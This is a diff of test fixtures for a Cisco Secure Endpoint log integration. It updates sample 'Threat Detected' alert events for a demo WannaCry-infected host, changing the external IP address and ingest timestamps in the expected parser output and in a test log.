@@ -7614,8 +7614,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025476413Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764527800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7637,7 +7637,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7687,7 +7687,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -7704,8 +7704,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025478624Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764532300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7727,7 +7727,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7777,7 +7777,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -7794,8 +7794,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025480920Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764538200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7817,7 +7817,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7867,7 +7867,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -7884,8 +7884,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025483136Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764542500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7907,7 +7907,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7957,7 +7957,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -7974,8 +7974,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025485390Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764547600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7997,7 +7997,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -8050,7 +8050,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -8067,8 +8067,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025487606Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:39.764551600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -8090,7 +8090,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -8140,7 +8140,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -8157,8 +8157,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025489842Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764556100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -8180,7 +8180,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log index dc134052124..71eea7f5cbc 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log 
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log 
@@ -1,62 +1,62 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"